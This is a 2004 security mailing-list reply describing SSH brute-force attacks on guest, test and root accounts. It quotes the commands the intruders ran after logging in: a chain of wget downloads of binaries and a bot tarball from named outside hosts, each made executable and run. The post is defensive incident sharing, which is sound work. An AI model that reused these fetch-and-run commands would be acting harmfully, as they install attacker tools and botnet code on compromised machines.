Security Incidents mailing list archives
Re: SSH attacks?
From: Chris Brenton <cbrenton () chrisbrenton org>
Date: Tue, 27 Jul 2004 23:43:50 -0400
On Tue, 2004-07-27 at 14:00, Tobias Rice wrote:
| Does anyone know why this would appear all of a sudden? I'm getting *lots* of these, too. I just assumed it was a new sk tool since the first time I had this in IDS I tracked it to a compromised redhat box in Italy. One varient also tried root.
This has been discussed over the last few weeks on the DShield mailing list. The highlights: Accounts checked are guest, test & root Its simple brute force guessing (mostly blank password attempts) Sources are usually old, unpatched, default install Linux boxes Commands run once they get in: wget yahaa.at/p/prt wget yahaa.at/p/90 chmod +x 90 ./90 chod +x prt ./prt wget yahaa.at/p/brk chmod +x brk ./brk wget undernet.at/0 chmod +x 0 ./0 wget dilimake.com/doremap chmod +x doremap ./doremap wget slap.go.ro/bot.tar.gz tar -xzvf bot.tar.gz cd bot and it goes on from there. Pretty much an amateur that sometimes gets lucky. No worries if you have a good password policy. Chris
Current thread:
- SSH attacks? Robin (Jul 27)
- Re: SSH attacks? Tobias Rice (Jul 27)
- Re: SSH attacks? Chris Brenton (Jul 28)
- Re: SSH attacks? Josh Tolley (Jul 27)
- Re: SSH attacks? Chris Brown (Jul 27)
- Re: SSH attacks? Adam Young (Jul 27)
- Re: SSH attacks? Christine Kronberg (Jul 29)
- Re: SSH attacks? Pieter-Bas IJdens (Jul 29)
- Re: SSH attacks? Christine Kronberg (Jul 29)
- Re: SSH attacks? Pieter-Bas IJdens (Jul 30)
- Re: SSH attacks? Frank Knobbe (Jul 30)
- Re: SSH attacks? Jay D. Dyson (Jul 30)
- Re: SSH attacks? Frank Knobbe (Jul 31)
- Re: SSH attacks? Christine Kronberg (Jul 29)
- Re: SSH attacks? Tobias Rice (Jul 27)